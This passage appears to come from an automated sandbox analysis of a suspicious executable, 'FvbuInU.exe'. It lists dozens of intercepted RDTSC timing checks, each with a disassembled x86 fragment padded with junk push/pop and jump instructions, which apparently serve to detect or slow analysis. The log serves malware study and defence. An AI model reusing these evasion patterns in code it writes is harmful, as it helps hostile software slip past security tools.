Source: C:\Users\user\Desktop\FvbuInU.exe	RDTSC instruction interceptor: First address: FFBD16 second address: FFBD1A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FvbuInU.exe	RDTSC instruction interceptor: First address: FFB83A second address: FFB85A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 jo 00007F8E8511F5EBh 0x0000000b jmp 00007F8E8511F5E5h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\FvbuInU.exe	RDTSC instruction interceptor: First address: FFB9E5 second address: FFB9E9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FvbuInU.exe	RDTSC instruction interceptor: First address: FFF303 second address: FFF30E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F8E8511F5D6h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\FvbuInU.exe	RDTSC instruction interceptor: First address: FFF30E second address: FFF315 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\FvbuInU.exe	RDTSC instruction interceptor: First address: FFF315 second address: FFF321 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push ebx 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\FvbuInU.exe	RDTSC instruction interceptor: First address: FFF321 second address: FFF327 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\FvbuInU.exe	RDTSC instruction interceptor: First address: FFF327 second address: FFF32D instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\FvbuInU.exe	RDTSC instruction interceptor: First address: FFF32D second address: FFF348 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F8E84B4EF82h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\FvbuInU.exe	RDTSC instruction interceptor: First address: FFED89 second address: FFED8D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FvbuInU.exe	RDTSC instruction interceptor: First address: 1009657 second address: 1009677 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8E84B4EF85h 0x00000009 jl 00007F8E84B4EF76h 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\FvbuInU.exe	RDTSC instruction interceptor: First address: 1009677 second address: 1009683 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jne 00007F8E8511F5D6h 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\FvbuInU.exe	RDTSC instruction interceptor: First address: 1019508 second address: 101952B instructions: 0x00000000 rdtsc 0x00000002 jp 00007F8E84B4EF76h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jmp 00007F8E84B4EF80h 0x00000010 jg 00007F8E84B4EF76h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\FvbuInU.exe	RDTSC instruction interceptor: First address: 10182FD second address: 1018301 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FvbuInU.exe	RDTSC instruction interceptor: First address: 1018610 second address: 101861A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F8E84B4EF76h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\FvbuInU.exe	RDTSC instruction interceptor: First address: 1018762 second address: 101879D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8E8511F5E9h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push edx 0x0000000c jnc 00007F8E8511F5D6h 0x00000012 pushad 0x00000013 popad 0x00000014 pop edx 0x00000015 jmp 00007F8E8511F5DAh 0x0000001a jo 00007F8E8511F5DEh 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
Source: C:\Users\user\Desktop\FvbuInU.exe	RDTSC instruction interceptor: First address: 101D9A2 second address: 101D9AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F8E84B4EF76h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\FvbuInU.exe	RDTSC instruction interceptor: First address: 101D5E0 second address: 101D5FD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8E8511F5E8h 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\FvbuInU.exe	RDTSC instruction interceptor: First address: 10272B6 second address: 10272BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\FvbuInU.exe	RDTSC instruction interceptor: First address: 102BB67 second address: 102BB6B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FvbuInU.exe	RDTSC instruction interceptor: First address: 102D0FD second address: 102D101 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FvbuInU.exe	RDTSC instruction interceptor: First address: 102D101 second address: 102D116 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F8E8511F5D6h 0x00000008 jng 00007F8E8511F5D6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pushad 0x00000011 push eax 0x00000012 pop eax 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\FvbuInU.exe	RDTSC instruction interceptor: First address: 103B8FB second address: 103B901 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\FvbuInU.exe	RDTSC instruction interceptor: First address: 103B73A second address: 103B740 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\FvbuInU.exe	RDTSC instruction interceptor: First address: 103B740 second address: 103B744 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FvbuInU.exe	RDTSC instruction interceptor: First address: 103B744 second address: 103B779 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8E8511F5E1h 0x00000007 jmp 00007F8E8511F5E9h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 pop eax 0x00000013 push eax 0x00000014 pop eax 0x00000015 rdtsc
Source: C:\Users\user\Desktop\FvbuInU.exe	RDTSC instruction interceptor: First address: 103B779 second address: 103B77F instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\FvbuInU.exe	RDTSC instruction interceptor: First address: 103B77F second address: 103B788 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\FvbuInU.exe	RDTSC instruction interceptor: First address: 103B788 second address: 103B793 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop esi 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\FvbuInU.exe	RDTSC instruction interceptor: First address: 103F627 second address: 103F62B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FvbuInU.exe	RDTSC instruction interceptor: First address: 103F62B second address: 103F648 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F8E84B4EF76h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007F8E84B4EF7Eh 0x00000011 push edi 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\FvbuInU.exe	RDTSC instruction interceptor: First address: 103F383 second address: 103F38B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\FvbuInU.exe	RDTSC instruction interceptor: First address: 1053F63 second address: 1053F7B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jc 00007F8E84B4EF7Eh 0x0000000d js 00007F8E84B4EF76h 0x00000013 pushad 0x00000014 popad 0x00000015 push ebx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\FvbuInU.exe	RDTSC instruction interceptor: First address: 1053267 second address: 105327F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F8E8511F5E2h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\FvbuInU.exe	RDTSC instruction interceptor: First address: 10536C6 second address: 10536CA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FvbuInU.exe	RDTSC instruction interceptor: First address: 10536CA second address: 10536D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\FvbuInU.exe	RDTSC instruction interceptor: First address: 10536D0 second address: 10536F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jp 00007F8E84B4EF90h 0x0000000c jmp 00007F8E84B4EF84h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\FvbuInU.exe	RDTSC instruction interceptor: First address: 1053872 second address: 1053876 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FvbuInU.exe	RDTSC instruction interceptor: First address: 1053876 second address: 105387A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FvbuInU.exe	RDTSC instruction interceptor: First address: 1053A12 second address: 1053A16 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FvbuInU.exe	RDTSC instruction interceptor: First address: 1053B55 second address: 1053B5B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\FvbuInU.exe	RDTSC instruction interceptor: First address: 1053CAD second address: 1053CC5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8E8511F5E4h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\FvbuInU.exe	RDTSC instruction interceptor: First address: 1056BC1 second address: 1056BE5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8E84B4EF88h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ecx 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push ebx 0x0000000e pushad 0x0000000f popad 0x00000010 pop ebx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\FvbuInU.exe	RDTSC instruction interceptor: First address: 1056F7A second address: 1056F85 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F8E8511F5D6h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\FvbuInU.exe	RDTSC instruction interceptor: First address: 1056F85 second address: 1056F8B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\FvbuInU.exe	RDTSC instruction interceptor: First address: 1056F8B second address: 1056FE3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8E8511F5DAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], eax 0x0000000e call 00007F8E8511F5E4h 0x00000013 call 00007F8E8511F5E8h 0x00000018 mov dx, 70ECh 0x0000001c pop edx 0x0000001d pop edx 0x0000001e push dword ptr [ebp+122D2FA1h] 0x00000024 mov edx, esi 0x00000026 push ECD781B4h 0x0000002b push eax 0x0000002c push edx 0x0000002d push eax 0x0000002e push eax 0x0000002f pop eax 0x00000030 pop eax 0x00000031 rdtsc
Source: C:\Users\user\Desktop\FvbuInU.exe	RDTSC instruction interceptor: First address: 1059B37 second address: 1059B3D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\FvbuInU.exe	RDTSC instruction interceptor: First address: 1059B3D second address: 1059B41 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FvbuInU.exe	RDTSC instruction interceptor: First address: 1059B41 second address: 1059B53 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c jg 00007F8E84B4EF76h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\FvbuInU.exe	RDTSC instruction interceptor: First address: 1059B53 second address: 1059B5B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\FvbuInU.exe	RDTSC instruction interceptor: First address: 105BB6F second address: 105BB9B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8E84B4EF86h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c push edi 0x0000000d pop edi 0x0000000e jmp 00007F8E84B4EF7Dh 0x00000013 rdtsc
Source: C:\Users\user\Desktop\FvbuInU.exe	RDTSC instruction interceptor: First address: F6F84F second address: F6F855 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\FvbuInU.exe	RDTSC instruction interceptor: First address: 5370925 second address: 5370929 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FvbuInU.exe	RDTSC instruction interceptor: First address: 5370929 second address: 537092D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FvbuInU.exe	RDTSC instruction interceptor: First address: 537092D second address: 5370933 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\FvbuInU.exe	RDTSC instruction interceptor: First address: 5370933 second address: 537096E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8E8511F5E4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b pushad 0x0000000c movzx ecx, bx 0x0000000f mov ax, bx 0x00000012 popad 0x00000013 push ebp 0x00000014 pushad 0x00000015 call 00007F8E8511F5E0h 0x0000001a mov bh, cl 0x0000001c pop edi 0x0000001d push eax 0x0000001e push edx 0x0000001f mov ah, 19h 0x00000021 rdtsc
Source: C:\Users\user\Desktop\FvbuInU.exe	RDTSC instruction interceptor: First address: 537096E second address: 5370972 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FvbuInU.exe	RDTSC instruction interceptor: First address: 5370972 second address: 537098E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp], ecx 0x0000000a jmp 00007F8E8511F5DBh 0x0000000f xchg eax, esi 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\FvbuInU.exe	RDTSC instruction interceptor: First address: 537098E second address: 5370992 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FvbuInU.exe	RDTSC instruction interceptor: First address: 5370992 second address: 5370996 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FvbuInU.exe	RDTSC instruction interceptor: First address: 5370996 second address: 537099C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\FvbuInU.exe	RDTSC instruction interceptor: First address: 537099C second address: 53709B9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8E8511F5E9h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\FvbuInU.exe	RDTSC instruction interceptor: First address: 53709B9 second address: 5370A10 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8E84B4EF81h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c jmp 00007F8E84B4EF81h 0x00000011 xchg eax, esi 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 movsx edx, si 0x00000018 pushfd 0x00000019 jmp 00007F8E84B4EF84h 0x0000001e or cx, 5138h 0x00000023 jmp 00007F8E84B4EF7Bh 0x00000028 popfd 0x00000029 popad 0x0000002a rdtsc
Source: C:\Users\user\Desktop\FvbuInU.exe	RDTSC instruction interceptor: First address: 5370A10 second address: 5370A28 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8E8511F5E4h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\FvbuInU.exe	RDTSC instruction interceptor: First address: 5370A28 second address: 5370A81 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 lea eax, dword ptr [ebp-04h] 0x0000000b pushad 0x0000000c movsx ebx, ax 0x0000000f pushfd 0x00000010 jmp 00007F8E84B4EF86h 0x00000015 sbb esi, 667CF5F8h 0x0000001b jmp 00007F8E84B4EF7Bh 0x00000020 popfd 0x00000021 popad 0x00000022 nop 0x00000023 pushad 0x00000024 mov bx, ax 0x00000027 mov esi, 719F9527h 0x0000002c popad 0x0000002d push eax 0x0000002e jmp 00007F8E84B4EF7Dh 0x00000033 nop 0x00000034 push eax 0x00000035 push edx 0x00000036 push eax 0x00000037 push edx 0x00000038 push eax 0x00000039 push edx 0x0000003a rdtsc
Source: C:\Users\user\Desktop\FvbuInU.exe	RDTSC instruction interceptor: First address: 5370A81 second address: 5370A85 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FvbuInU.exe	RDTSC instruction interceptor: First address: 5370A85 second address: 5370A98 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8E84B4EF7Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\FvbuInU.exe	RDTSC instruction interceptor: First address: 5370A98 second address: 5370A9E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\FvbuInU.exe	RDTSC instruction interceptor: First address: 5370A9E second address: 5370AA2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FvbuInU.exe	RDTSC instruction interceptor: First address: 5370AD4 second address: 5370B44 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F8E8511F5DFh 0x00000009 sbb ax, 21DEh 0x0000000e jmp 00007F8E8511F5E9h 0x00000013 popfd 0x00000014 pushfd 0x00000015 jmp 00007F8E8511F5E0h 0x0000001a or si, 19D8h 0x0000001f jmp 00007F8E8511F5DBh 0x00000024 popfd 0x00000025 popad 0x00000026 pop edx 0x00000027 pop eax 0x00000028 cmp dword ptr [ebp-04h], 00000000h 0x0000002c push eax 0x0000002d push edx 0x0000002e pushad 0x0000002f call 00007F8E8511F5DBh 0x00000034 pop eax 0x00000035 mov ebx, 4C409F4Ch 0x0000003a popad 0x0000003b rdtsc
Source: C:\Users\user\Desktop\FvbuInU.exe	RDTSC instruction interceptor: First address: 5370B44 second address: 5370B75 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8E84B4EF82h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov esi, eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F8E84B4EF87h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\FvbuInU.exe	RDTSC instruction interceptor: First address: 5370C11 second address: 5360008 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop ecx 0x00000005 mov si, di 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop esi 0x0000000c jmp 00007F8E8511F5DDh 0x00000011 leave 0x00000012 jmp 00007F8E8511F5DEh 0x00000017 retn 0004h 0x0000001a nop 0x0000001b sub esp, 04h 0x0000001e xor ebx, ebx 0x00000020 cmp eax, 00000000h 0x00000023 je 00007F8E8511F73Fh 0x00000029 mov dword ptr [esp], 0000000Dh 0x00000030 call 00007F8E896E0695h 0x00000035 mov edi, edi 0x00000037 push eax 0x00000038 push edx 0x00000039 push eax 0x0000003a push edx 0x0000003b pushad 0x0000003c popad 0x0000003d rdtsc
Source: C:\Users\user\Desktop\FvbuInU.exe	RDTSC instruction interceptor: First address: 5360008 second address: 5360020 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8E84B4EF84h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\FvbuInU.exe	RDTSC instruction interceptor: First address: 5360020 second address: 5360026 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\FvbuInU.exe	RDTSC instruction interceptor: First address: 5360026 second address: 536002A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FvbuInU.exe	RDTSC instruction interceptor: First address: 536002A second address: 5360066 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esp 0x00000009 pushad 0x0000000a mov di, cx 0x0000000d mov si, EA47h 0x00000011 popad 0x00000012 mov dword ptr [esp], ebp 0x00000015 pushad 0x00000016 mov edi, esi 0x00000018 push ecx 0x00000019 mov di, 1836h 0x0000001d pop ebx 0x0000001e popad 0x0000001f mov ebp, esp 0x00000021 push eax 0x00000022 push edx 0x00000023 jmp 00007F8E8511F5E9h 0x00000028 rdtsc
Source: C:\Users\user\Desktop\FvbuInU.exe	RDTSC instruction interceptor: First address: 5360066 second address: 53600B2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8E84B4EF81h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 sub esp, 2Ch 0x0000000c jmp 00007F8E84B4EF7Eh 0x00000011 xchg eax, ebx 0x00000012 pushad 0x00000013 mov ecx, 095BEFCDh 0x00000018 mov ah, BBh 0x0000001a popad 0x0000001b push eax 0x0000001c pushad 0x0000001d pushad 0x0000001e mov bx, cx 0x00000021 popad 0x00000022 call 00007F8E84B4EF83h 0x00000027 push eax 0x00000028 push edx 0x00000029 rdtsc
Source: C:\Users\user\Desktop\FvbuInU.exe	RDTSC instruction interceptor: First address: 53600B2 second address: 53600F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 popad 0x00000006 xchg eax, ebx 0x00000007 pushad 0x00000008 mov ebx, 58724706h 0x0000000d mov ecx, edx 0x0000000f popad 0x00000010 push esp 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 pushfd 0x00000015 jmp 00007F8E8511F5DBh 0x0000001a and ax, 8D8Eh 0x0000001f jmp 00007F8E8511F5E9h 0x00000024 popfd 0x00000025 mov ebx, ecx 0x00000027 popad 0x00000028 rdtsc
Source: C:\Users\user\Desktop\FvbuInU.exe	RDTSC instruction interceptor: First address: 5360194 second address: 53601A6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8E84B4EF7Eh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\FvbuInU.exe	RDTSC instruction interceptor: First address: 53601A6 second address: 5360246 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8E8511F5DBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b inc ebx 0x0000000c jmp 00007F8E8511F5E6h 0x00000011 test al, al 0x00000013 pushad 0x00000014 pushfd 0x00000015 jmp 00007F8E8511F5DEh 0x0000001a or cx, 9E48h 0x0000001f jmp 00007F8E8511F5DBh 0x00000024 popfd 0x00000025 call 00007F8E8511F5E8h 0x0000002a jmp 00007F8E8511F5E2h 0x0000002f pop esi 0x00000030 popad 0x00000031 je 00007F8E8511F72Bh 0x00000037 jmp 00007F8E8511F5E1h 0x0000003c lea ecx, dword ptr [ebp-14h] 0x0000003f push eax 0x00000040 push edx 0x00000041 jmp 00007F8E8511F5DDh 0x00000046 rdtsc
Source: C:\Users\user\Desktop\FvbuInU.exe	RDTSC instruction interceptor: First address: 53602B1 second address: 53602B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FvbuInU.exe	RDTSC instruction interceptor: First address: 53602B5 second address: 53602BB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\FvbuInU.exe	RDTSC instruction interceptor: First address: 53602BB second address: 53602C1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\FvbuInU.exe	RDTSC instruction interceptor: First address: 53602C1 second address: 53602C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FvbuInU.exe	RDTSC instruction interceptor: First address: 53602C5 second address: 53602EB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007F8E84B4EF7Dh 0x0000000e nop 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F8E84B4EF7Dh 0x00000016 rdtsc
Source: C:\Users\user\Desktop\FvbuInU.exe	RDTSC instruction interceptor: First address: 53603B7 second address: 5360433 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8E8511F5E8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b jmp 00007F8E8511F5DBh 0x00000010 xchg eax, esi 0x00000011 pushad 0x00000012 jmp 00007F8E8511F5E4h 0x00000017 mov ax, 45B1h 0x0000001b popad 0x0000001c nop 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 pushfd 0x00000021 jmp 00007F8E8511F5E9h 0x00000026 and si, 4BF6h 0x0000002b jmp 00007F8E8511F5E1h 0x00000030 popfd 0x00000031 mov edx, ecx 0x00000033 popad 0x00000034 rdtsc
Source: C:\Users\user\Desktop\FvbuInU.exe	RDTSC instruction interceptor: First address: 5360433 second address: 5360439 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
